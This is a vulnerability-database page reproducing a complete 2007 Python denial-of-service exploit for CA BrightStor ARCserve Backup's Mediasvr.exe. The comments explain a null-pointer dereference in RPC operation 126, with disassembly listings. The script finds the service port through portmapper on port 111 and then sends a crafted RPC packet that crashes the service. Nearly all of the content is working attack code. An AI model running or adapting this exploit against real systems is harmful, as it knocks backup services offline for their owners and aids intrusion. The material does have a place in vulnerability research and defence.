Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

CA BrightStor Backup 11.5.2.0 Mediasvr.exe Denial of Service Exploit

🗓️ 16 May 2007 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 29 Views

Computer Associates (CA) Brightstor Backup Mediasvr.exe DoS (catirpc.dll/rwxdr.dll) - RPC operation 126 denial of service exploi

Code

                                                #!/usr/bin/python
#
# Computer Associates (CA) Brightstor Backup Mediasvr.exe DoS (catirpc.dll/rwxdr.dll)
# (Previously Unknown)
#
# There is an issue with RPC operation 126 and the imported cactirpc.dll 
# and rwxdr.dll. It looks as if Mediasvr.exe identifies a Bad Job Handle 
# as seen in its log file.
# 
# Log Message:
# asms_manager_job_enumerate_devices_1_svc(): Bad Job Handle.  
#
# However, the process dies when trying to send an RPC response 
# for the bad job handle. This is caused be a null memory dereference.
# Within cactirpc.dll, the xdr_rwpair function is called: 
#
# Catirpc.dll:2E008A93 loc_2E008A93:                          
# Catirpc.dll:2E008A93 mov     ecx, [esi+10h]
# Catirpc.dll:2E008A96 push    ecx	<- ECX is 0x0041B310 (nulls)
# Catirpc.dll:2E008A97 push    edi	<- EDI is 0x009e2580 (nulls)
# Catirpc.dll:2E008A98 call    dword ptr [esi+14h] <-points to 0x2d6054f0
# Catirpc.dll:2E008A9B add     esp, 8		    (rwxdr.dll:xdr_rwpair)
# Catirpc.dll:2E008A9E pop     edi
# Catirpc.dll:2E008A9F pop     esi
# Catirpc.dll:2E008AA0 pop     ebx
# Catirpc.dll:2E008AA1 retn
#
# rwxdr.dll:xdr_rwpair
# .text:2D6054F0 public xdr_rwpair
# .text:2D6054F0 xdr_rwpair proc near                    
# .text:2D6054F0    
# .text:2D6054F0 arg_0= dword ptr  4
# .text:2D6054F0 arg_4= dword ptr  8
# .text:2D6054F0
# .text:2D6054F0 push    ebx
# .text:2D6054F1 mov     ebx, [esp+4+arg_4] <---puts 0x0041B310
# .text:2D6054F5 push    esi
# .text:2D6054F6 push    edi
# .text:2D6054F7 mov     edi, [esp+0Ch+arg_0] <--- puts 0x009e2580
# .text:2D6054FB mov     esi, [ebx]	<---- EBX is 0x00000000
# .text:2D6054FD mov     eax, [edi]     <---- EDI is 0x00000000
# .text:2D6054FF test    eax, eax
# .text:2D605501 jnz     short loc_2D605533
# .text:2D605503 mov     eax, [esi+4]	<---- ESI is set to 0x00000000
#
# This was tested on BrightStor ARCserve Backup 11.5.2.0 (SP2) with the latest 
# CA patches on Windows XP SP2 
#
# CA has been notified
#
# Author: M. Shirk
#
# (c) Copyright 2007 (Shirkdog Security) shirkdog_list $ at % hotmail dot com 
#
# Use at your own Risk: You have been warned 
#------------------------------------------------------------------------

import os
import sys
import time
import socket
import struct

#------------------------------------------------------------------------

#Start of RPC Packet
rpc_packet="\x80\x00\x00\x5c\x6b\x9b\x72\xbc\x00\x00\x00\x00\x00\x00\x00\x02"

#Program ID, and Operation 126
rpc_packet+="\x00\x06\x09\x7e\x00\x00\x00\x01\x00\x00\x00\x7e"

#nulls after Operation
rpc_packet+="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

#4 more bytes of junk (ALL HAIL BEEF)
rpc_packet+="\xde\xad\xbe\xef"

# Need to get the port Mediasvr.exe is listening on
rpc_portmap_req="\x80\x00\x00\x38\x21\x84\xf7\xc9\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86\xa0\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x09\x7e\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x00"

#------------------------------------------------------------------------

def ExploitMediaSvr(target,port):
	sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	sock.connect((target, port))
	sock.send(rpc_packet)
   	sock.close()
	print '[+] Done...\n[+] Mediasvr.exe is dead\n[+] ... or it will die in a few seconds for you inpatient bastards\n'


def GetMediaSvrPort(target):
	sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	sock.connect((target,111))
	sock.send(rpc_portmap_req)
	rec = sock.recv(256)

	port1 = rec[-4]
	port2 = rec[-3]
	port3 = rec[-2]
	port4 = rec[-1]	
	
	port1 = hex(ord(port1))
	port2 = hex(ord(port2))
	port3 = hex(ord(port3))
	port4 = hex(ord(port4))
	port = '%02x%02x%02x%02x' % (int(port1,16),int(port2,16),int(port3,16),int(port4,16))
	
	port = int(port,16)
	
	print '[+] Sending TCP Packet of Death to Target: %s Port: %s' % (target,port)
	ExploitMediaSvr(target,port)
	



if __name__=="__main__":
       try:
               target = sys.argv[1]
       except IndexError:
           	print '[+] Computer Associates (CA) Brightstor Backup Mediasvr.exe DoS (catirpc.dll/rwxdr.dll)'
       		print '[+] Author: Shirkdog'
               	print '[+] Usage: %s <target ip>\n' % sys.argv[0]
               	sys.exit(-1)

       print '[+] Computer Associates (CA) Brightstor Backup Mediasvr.exe DoS (catirpc.dll/rwxdr.dll)'
       print '[+] Author: Shirkdog'

       GetMediaSvrPort(target)

# milw0rm.com [2007-05-16]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 May 2007 00:00Current
7.1High risk
Vulners AI Score7.1
ca brightstor backupdenial of serviceexploitrpc operation 126mediasvr.execatirpc.dllrwxdr.dllwindows xp sp2shirkdog security
29